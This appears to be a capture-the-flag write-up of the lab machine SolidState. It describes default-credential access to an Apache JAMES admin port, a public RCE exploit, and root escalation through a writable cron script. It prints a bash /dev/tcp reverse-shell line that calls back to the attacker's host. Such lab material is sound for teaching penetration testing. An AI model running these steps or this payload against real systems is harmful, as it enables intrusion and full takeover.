# SOLIDSTATE | 10.10.10.51

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.51

### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.4p1 Debian
* 25 - SMTP - JAMES smtpd 2.3.2
* 80 - HTTP - Apache httpd 2.4.25 Debian
* 110 - pop3 - JAMES pop3d 2.3.2
* 119 - nntp - JAMES nntpd (posting ok)
* 4555 - james-admin - JAMES Remote Admin 2.3.2

## Services Enumeration

### 22 - SSH

Let's just leave this for now, as we need valid credentials and there is currently more low-hanging fruit to be had.

### 25,110,119 - JAMES Mail Server

A searchsploit query pulls up an authenticated RCE based on python 2 (which means I'll have to modify yet another exploit to work in Python 3), and a web search gives me the same exploit, just written differently. They both rely on knowing the server admin credentials, which I'll get to with the next James port.

![](img/searchsploit-james.png)

### 80 - HTTP

This looks to be a website for a cybersecurity company, so everything must be locked up real tight.

![](img/port-80.png)

### 4555 - james-admin

This is obviously the remote admin port. Using a web browser does not work, but I can use netcat to check it out:

    nc 10.10.10.51 4555

Incredibly, default creds of `root:root` work and I am now connected to the admin terminal interface:

![](img/james-admin.png)

Let's see what I can enumerate from here:

![](img/users.png)

I can also change any user's password, as well as create a new user. But I am getting ahead of myself here. Let's move on to the next section.

# Exploitation

Both of the [exploits](exploits) involve creating a new user that has a certain path in the name - the server lacks proper input validation so you can pretty much create any user you like. A very detailed writeup about this exploit is located [here](https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html).

Trying the first script, I need to add my own payload for a reverse shell. I'm going with netcat because every linux system has it:

![](img/payload.png)

After running the exploit (I didn't have to change anything else) it notified me the payload would execute once any user logged in, which baffled me for a while. Then I remembered I could change all the user's email passwords, so I did that and then had to figure out how to log in. Apparently telnet is the way that works:

![](img/mindymail.png)

The second email has an SSH password for mindy as well as a message about restricted access:

![](img/mindypass.png)

Now I am ready to trigger the exploit. I need to spin up a netcat listener:

    nc -nvlp 6969

Then I log in with the credentials and the exploit is triggered. It's pretty ugly on the user's side:

![](img/mindy-ssh.png)

But then I do have a less restricted shell that I can upgrade with python:

![](img/user-shell.png)

### Flag

![](img/user-flag.png)

## User Enumeration

After checking mindy's home dir and not finding anything, I checked what I could of the other user (james), and also didn't find much. I pulled over linpeas and ran that, also not finding anything sus. So then I pulled over pspy so I could watch what processes were running and I found something interesting:

![](img/pspy.png)

The root user is running a cron that runs the file `tmp.py` - let's check that out:

![](img/tmp-py.png)

## Privilege Escalation

Oh this is good - it's a file that is run by root, and I can write to it! I will add a command for a reverse shell and when root runs the script it should connect back to me.

    os.system('bash -c "bash -i >& /dev/tcp/10.10.14.17/9001 0>&1"')

Meanwhile I have another netcat listener going, just waiting for the connect back:

![](img/root-shell.png)

Ok there it is!

### Flag

![](img/root-flag.png)

## Conclusion

I didn't have too much fun with this machine, but I did learn that I didn't even need that exploit at all; I could just log into mindy's SSH account and then type `bash` FFS. Oh well.

Steps taken:

* Reset email passwords via Email Admin interface (it had default creds)
* Log in to user's email, find SSH credentials
* Use public exploit to add new email user via lack of input validation, injecting reverse shell command
* Log in to SSH that has a restricted shell
* Exploit triggers, giving me regular access
* Escalate to root via writable python script that is run as root in a cron
